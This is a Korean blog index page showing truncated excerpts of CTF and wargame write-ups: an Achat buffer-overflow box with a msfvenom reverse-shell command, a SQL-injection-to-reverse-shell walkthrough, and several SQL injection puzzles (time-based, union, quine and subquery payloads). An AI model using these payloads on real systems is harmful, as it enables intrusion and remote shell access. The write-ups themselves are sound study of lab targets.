워게임200 chatterbox 롸업 정리 nmap 결과 죽어도 안나온다.... 박스가 죽은건지,,, 삽질하다가 그냥 롸업에 나온 nmap 결과보고 익스해본다. searchsploit achat 딱봐도 첫 번째걸 봐야겠지? 여기서 눈에 띄는 부분이 있다. - payload의 length가 1152보다 크면 안되는 것 같다. 이보다 작은 크기의 리버스쉘을 생생해서 buf 대신 넣으면 될 듯 - msfvenom으로 리버스쉘 만드는 옵션 다 줬다. msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x.. 2021. 10. 12. jarvis 롸업 정리 nmap gobuster(삽질) not useful . . 10.10.10.143 뒤져보기 /room.php?cod=3 여기서 LFI, RFI 시도 후 안되니까 sqli 시도 /room.php?cod=3 or sleep(1)%23 -> 10초 딜레이되는 것을 보고 취약하구나 판단 SQL injection 1. 컬럼 개수 파악하기 ?cod=4 order by 6 7 8 -> 데이터가 없어진다.. 오류가 있다는 뜻 => 컬럼 7개 파악 2. 컬럼이 각각 어디에 위치하는지 구하기 ?cod=999 union select 1,2,3,4,5,6,7 3. sql injection으로 리버스 쉘 따기 로컬에 shell.php로 php 리버스 쉘코드 저장 python -m SimpleHTTPServer 5555 로컬에서.. 2021. 10. 10. alien (!sleep(1)&&now()%2=1) query1, query2가 있다. query1 결과의 id != admin ->> sandbox1 query1 결과의 id == admin ->> sandbox2 query2 결과의 id == admin ->> sandbox ?? 쿼리를 계속 변하게 해야한다는 것인가,,, 이해하고 넘어가는 걸로... ?no=1 union select concat(lower(hex(10+(!sleep(1)&&now()%2=1))), 0x646d696e)#' union select concat(lower(hex(9+(!sleep(1)&&now()%2=1))), 0x646d696e)# !sleep(1)&&now()%2=1 현재 시간에 따라 0 혹은 1을 반환한다. -> 왜 인지는 모르겠다... hex(10+0) = A/ h.. 2021. 10. 10. zombie(quine대신 quine하기) 항상 참으로 만들어도 아무 데이터도 출력되지 않는다. 아무 데이터도 없는 것 같다. pw가 DB에 있어야만 출력이 된다. 오류창도 딱히 없다. 이전의 콰인과 굉장히 비슷해보이지만 replace의 ace를 쓸 수 없다. select * from information_schema.processlist; 바로 직전에 실행한 쿼리문이 담기는 것을 볼 수 있다. ?pw=' union select substr(info, 38, xx) from information_schema.processlist# s = "select pw from prob_zombie where pw='" len(s) # 37 w = "' union select substr(info, 38, xx) from information_schema.p.. 2021. 10. 10. ouroboros(quine sql injection) id도 없고.. 그냥 pw 하나 뿐인 당황스러운 문제... ?pw=' or if(length(pw)=0, 9e307*2, 0)%23 로도 에러 창을 확인했지만 에러창이 따로 뜨지 않았다. 중요한 걸 간과했다. 컬럼이 하나밖에 없는데 데이터가 하나도 출력 안 된 것을 알 수 있다. 즉, 디비에 데이터가 없다. 그렇다면 $_result[pw]와 $_GET[pw]가 같기만 하면 된다. Quine SQL injection Quine은 소스코드를 그대로 출력하는 프로그램이다. pw=a' union SELECT REPLACE(REPLACE('a" union SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine#',CHAR(34),CHAR(39)).. 2021. 10. 9. phantom(서브쿼리) $_SERVER["REMOTE_ADDR"] : 웹서버에 접속한 접속자의 IP 정보를 갖고있다. no=1 즉 127.0.0.1의 email을 알아내라 롸업을 보기는 했지만 어려운 문제는 아니었다. 다만 여태 푼 문제 중 이렇게 푼 문제가 없어서 생각해내지 못했다. 그래도 알아가면 됐지! ?pw=qw', (0, '내 ip', (select email from prob_phantom from no=1))%23 이렇게 하면 될 것 같지만 되지 않는다. [****] 서브쿼리를 줄 때 자신의 테이블에서 참조가 안된다. 더 자세히 말하면, insert/ update/ delete에서 서브쿼리로 동일한 테이블의 조건을 사용할 때 에러가 발생한다. insert into attack values (11, 'du', 'du.. 2021. 10. 9. 이전 1 ··· 14 15 16 17 18 19 20 ··· 34 다음